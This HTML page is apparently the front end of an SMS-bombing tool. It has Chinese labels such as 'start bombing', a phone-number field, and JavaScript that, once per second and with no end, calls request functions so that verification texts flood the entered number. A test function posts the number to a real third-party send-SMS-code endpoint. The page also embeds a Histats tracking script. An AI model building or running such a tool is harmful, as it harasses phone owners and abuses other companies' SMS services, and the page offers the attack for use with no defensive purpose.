<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>测试</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="shortcut icon" href="avatar.png" />
    <link rel="stylesheet" href="./css/bootstrap.min.css">
    <link href="./css/global.css" rel="stylesheet" />
    <script src="./js/jquery-3.4.1.min.js"></script>
    <script src="./js/svg-ctrl.js"></script>
    <script src="./js/index.js"></script>
    <style>
        #code {
            font-family: Arial;
            font-style: italic;
            font-weight: bold;
            border: 0;
            letter-spacing: 2px;
            color: blue;
        }
        #code1 {
            font-family: Arial;
            font-weight: bold;
            border: 0;
            letter-spacing: 2px;

        }
        html {
              height: 100%;
              width: 100%;
              background-image: radial-gradient(ellipse farthest-corner at center top, #000d4d 0%, #000105 100%);
        }
        body {
            width: 100%;
            height: 100%;
            margin: 0;
            overflow: hidden;
            background-color: transparent;
            position: relative;
        }
        sup{
            vertical-align: text-bottom;
            top: -10px;
        }
        /* ul,li{
            padding: 0;
            margin-bottom: 10px;
            list-style: none;
        }
        #tab li{
            float: left;
            background-color:white;
            color: #428bca;
            padding: 5px;
            margin-right: 2px;
            width:49%;
            font-size:20px;
        }
        #tab li.tabin{
            background-color:#F2F6FB;
            border-bottom: 0px;
            z-index: 100;
            color:red;
            position: relative;
        }
        #content{


            clear: left;
            position: relative;
            top: -1px;
        } */
    </style>
</head>

<body class="no-canvas" style="min-height: 680px;overflow-y: auto;">
    <canvas id="canvas" width="" height=""></canvas>
    <div class="container">
        <div class="form-field-container register-form">
            <div class="widget">
	<div class="text-center">
	            <img src="dx.png" alt="Avatar" width="80" style="height: auto filter: alpha(Opacity=80);-moz-opacity: 0.80;opacity: 0.80;" >
                        </a>
                 </div>
	<br></br>
             <div id="goodTypeContents">
                <div class="form-group" id="display_searchBar">
                    <form method="GET" action="index.php">
	        <div class="input-group"><div class="input-group-addon">手机号码</div>
	            <input type="text" class="form-control" placeholder="输入手机号码" id="phone">
	        </div>
                    </form>
                </div>
	
	<div style="text-align: center;">
                    <button class="btn btn-success" id="start" onclick="send()">开始轰炸</button>
                    <button class="btn btn-danger" id="'end" onclick="end()">停止线程</button>
                    <button class="btn btn-primary float-right" onclick="test()">单元测试</button>
<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4650540,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4650540&101" alt="" border="0"></a></noscript>
<!-- Histats.com  END  -->
                </div>
	<br></br>
	<div class="alert alert-success mt-3 text-center mb-0 p-2" id="msg" role="alert">准备轰炸</div>		
            </div>
        </div>
    </div>

<script>

    var timer = null
    var index = 0

    // 开始发送
    function send() {

        $('#start').attr('disabled', true)
        $('#phone').attr('disabled', true)

        var phone = $("#phone").val()

        if (phone.length != 11) {
            $('#msg').text('请输入正确的手机号')
            return
        }

        $('#msg').text('正在向:' + phone + '发送')
        $('#msg').show()

        timer = setInterval(function () {
            if (index >= requestList.length) {
                index = 0;
            }
            requestList[index++].fn(phone)
        }, 1000)
    }

    // 停止发送
    function end() {
        $('#start').attr('disabled', false)
        $('#phone').attr('disabled', false)
        $('#msg').text('准备轰炸')
        clearTimeout(timer)
    }

    // 测试发送
    function test(phone = ''/*这里填写测试手机号, 仅测试用*/) {
        $.ajax({
            url: "https://uc-gateway.101.com/v1.1/sessions/ed7e5fc5-2529-4ecd-953a-abd06b27d7f8/actions/send_sms_code",
            type: 'POST',
            data: {"do":"ajax","view":"mobile","mobile":phone,"uuid":"1649646669713944"},
            async: false
        });
    }

</script>

</body>

</html>
